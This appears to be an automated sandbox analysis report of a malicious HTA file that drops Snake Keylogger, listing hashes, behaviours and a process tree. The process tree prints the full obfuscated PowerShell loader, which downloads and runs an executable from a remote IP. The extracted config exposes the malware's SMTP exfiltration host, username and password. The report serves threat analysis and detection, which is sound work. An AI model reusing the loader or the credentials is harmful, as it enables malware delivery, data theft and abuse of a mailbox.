Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28-09-2024 01:09
Static task
static1
Behavioral task
behavioral1
Sample
1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64.hta
Resource
win10v2004-20240802-en
General
-
Target
1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64.hta
-
Size
115KB
-
MD5
17116a0f43508549998ef6618154d77a
-
SHA1
e71af8b0489263e476521a5fd6e22e5511369c4d
-
SHA256
1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64
-
SHA512
a6824f19100e0fd4c996ab8db64875fb1c0c0e4d045792793b45ad1e93cb358c6746289209d8d1f4634c6ebed9ade9e43a5b3407856780e7e60954efc249e9d9
-
SSDEEP
96:Ea+M7wmf6PCZ60NUrnPmeobQk9B6/A6I6L1j+Z668AT:Ea+Qwmf6PCZ6kUTWfz6Y6dKZ6+T
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.teilecar.com - Port:
587 - Username:
[email protected] - Password:
Manta924porsche=911 - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/1140-29-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1140-30-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1140-31-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2496 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2496 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2156 dllhost.exe -
Loads dropped DLL 6 IoCs
pid Process 2496 powershell.exe 1484 WerFault.exe 1484 WerFault.exe 1484 WerFault.exe 1484 WerFault.exe 1484 WerFault.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000a000000015689-21.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2156 set thread context of 1140 2156 dllhost.exe 37 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1484 2156 WerFault.exe 36 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2496 powershell.exe 2496 powershell.exe 2496 powershell.exe 1140 RegSvcs.exe 1140 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2156 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2496 powershell.exe Token: SeDebugPrivilege 1140 RegSvcs.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 2156 dllhost.exe 2156 dllhost.exe 2156 dllhost.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2156 dllhost.exe 2156 dllhost.exe 2156 dllhost.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 2524 wrote to memory of 2488 2524 mshta.exe 30 PID 2524 wrote to memory of 2488 2524 mshta.exe 30 PID 2524 wrote to memory of 2488 2524 mshta.exe 30 PID 2524 wrote to memory of 2488 2524 mshta.exe 30 PID 2488 wrote to memory of 2496 2488 cmd.exe 32 PID 2488 wrote to memory of 2496 2488 cmd.exe 32 PID 2488 wrote to memory of 2496 2488 cmd.exe 32 PID 2488 wrote to memory of 2496 2488 cmd.exe 32 PID 2496 wrote to memory of 2800 2496 powershell.exe 33 PID 2496 wrote to memory of 2800 2496 powershell.exe 33 PID 2496 wrote to memory of 2800 2496 powershell.exe 33 PID 2496 wrote to memory of 2800 2496 powershell.exe 33 PID 2800 wrote to memory of 3016 2800 csc.exe 34 PID 2800 wrote to memory of 3016 2800 csc.exe 34 PID 2800 wrote to memory of 3016 2800 csc.exe 34 PID 2800 wrote to memory of 3016 2800 csc.exe 34 PID 2496 wrote to memory of 2156 2496 powershell.exe 36 PID 2496 wrote to memory of 2156 2496 powershell.exe 36 PID 2496 wrote to memory of 2156 2496 powershell.exe 36 PID 2496 wrote to memory of 2156 2496 powershell.exe 36 PID 2156 wrote to memory of 1140 2156 dllhost.exe 37 PID 2156 wrote to memory of 1140 2156 dllhost.exe 37 PID 2156 wrote to memory of 1140 2156 dllhost.exe 37 PID 2156 wrote to memory of 1140 2156 dllhost.exe 37 PID 2156 wrote to memory of 1140 2156 dllhost.exe 37 PID 2156 wrote to memory of 1140 2156 dllhost.exe 37 PID 2156 wrote to memory of 1140 2156 dllhost.exe 37 PID 2156 wrote to memory of 1140 2156 dllhost.exe 37 PID 2156 wrote to memory of 1484 2156 dllhost.exe 38 PID 2156 wrote to memory of 1484 2156 dllhost.exe 38 PID 2156 wrote to memory of 1484 2156 dllhost.exe 38 PID 2156 wrote to memory of 1484 2156 dllhost.exe 38 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c POwerSheLl -eX BypASs -nop -W 1 -c DevIceCrEdeNTiAldEplOymENT.Exe ; Iex($(iEX('[sYStem.tEXt.ENcoDINg]'+[char]0x3a+[ChAR]0X3a+'UTf8.GEtStRiNG([SyStem.cOnvErt]'+[char]0x3A+[char]0x3a+'FROMBasE64STRIng('+[CHAr]0X22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVmSW5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmNzY1NJTSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQ3FpWEIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvSkRMcGx6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuZEdHIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBya1lBRVF4ekt4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi82MDAvZGxsaG9zdC5leGUiLCIkRU52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c1RBclQtU0xlRVAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[CHAR]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOwerSheLl -eX BypASs -nop -W 1 -c DevIceCrEdeNTiAldEplOymENT.Exe ; Iex($(iEX('[sYStem.tEXt.ENcoDINg]'+[char]0x3a+[ChAR]0X3a+'UTf8.GEtStRiNG([SyStem.cOnvErt]'+[char]0x3A+[char]0x3a+'FROMBasE64STRIng('+[CHAr]0X22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVmSW5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmNzY1NJTSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQ3FpWEIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvSkRMcGx6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuZEdHIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBya1lBRVF4ekt4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi82MDAvZGxsaG9zdC5leGUiLCIkRU52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c1RBclQtU0xlRVAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[CHAR]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xlbizkac.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9F1E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9F1D.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:3016
-
-
-
C:\Users\Admin\AppData\Roaming\dllhost.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1140
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 4005⤵
- Loads dropped DLL
- Program crash
PID:1484
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5483f1fa29fdeb4eae97e9b4f1f449883
SHA1afb4adf44f7d25ecfd41192b5420526a1c789321
SHA256bb82c0394328066214d4057e16b5458473a41df52f51953a89703dfa40ed8dbe
SHA51299eaf615008bcc69a3269e804817792ceb1cdd0431ce4c30612c70280271189b9e428c91ec097e3bba78677277f816c9a9580f01a0cbe5a2956598ed7b81b357
-
Filesize
3KB
MD5e9334e9d5212e2c349546f5e3388646a
SHA13fa6d0ec6de41e5bed82ea6378c07834b5c96b28
SHA256272d6fa0c331f3b9a51103a75a026054efe86e1e274a471d9e17fbbe808c20d0
SHA512f7648b844214b071603569a88f5b0e8659c62d737c1f16d31b3917f105dcc43683f6857f738faf2204958082fe0d060105b6a62f84ba574c023e798deb3b6999
-
Filesize
7KB
MD5b3ba42df397e89bbc97868e1476eedac
SHA1ecc7ee8213cdf11bd80b5fd5d8f239e67ec44f96
SHA25620ffec703934b2f3fe57fd3d9da5afadc1adcfeb2a42186542a2b8cda2071f53
SHA5126d4fa41d473222ddf560ce43db2e45a4afb9ff789ce14d6e25161c597d434804ef356e1c10295bef3aa63b240f4bce7e96df33c9d234e914e8035da3c7147b70
-
Filesize
956KB
MD5249f4ca7f1cc801c87cebd0cdf0b398e
SHA11241f91fa9239ed0553c33f6d3651644813f6f84
SHA256b639e9680b5ac670c7b58863479c1cf9c7bea436aee481fa9729c6a82508e556
SHA5120b6ae1f507b5599f9fb651576e12ae378b66111193623d806f0e6266e8ee93f1fa5dedd4d4b96f3360fecc81962b76e9bacc7c1096a96df5b33fbd64aa6a18d6
-
Filesize
652B
MD5fdc1fe7eed84734db9109aa4743725fe
SHA1f83a01a593e552a168b18b00940a2e7b2770d476
SHA256a3819491d2298b83ec060e10f157e2cc38ac53a2e8163cd2259779a982112b41
SHA512b8c5973acd33a013149854376e875f410b44e0304016adfe0ca72d0a0650ec4e751e3ba3a4a3aa94141c6ee6304ffa840546da941e94e2f17a71470d15d6e184
-
Filesize
475B
MD574ac079a164eedfd18ee0237dead2da7
SHA162575f712ded8ea2637ee5e5eda8ae9cf2919dc1
SHA2566c72d2a89a0a1d35a067d9322c4c94503d5a75a2e6308cbf9b7bc95e9396f615
SHA5127994aaef91f02e10fd65e782063492a1658e9b1e6e6ffa3a54fce1ab14b39c19bbd3b61cea46908f87cfde0466ef53e3be352c003db797bef0c9f67875285dbb
-
Filesize
309B
MD5495f86e1756d25209bc8bb8e2f2a9011
SHA1d2c2ab0903e7b8764dce724857ab2130393f5860
SHA256c7f120e52484ff231ae0c99a9cbbd7ced041adfef791a2d05d0bf42f32e93c79
SHA512c5345e555516de2bd059295f97e1f7d17a1c87cf7e142157805abb6cfc1e44d365c39bb15d1b51c3a065de600ba1fb532190f20ce0c4dbb847917f5ea5e60ccd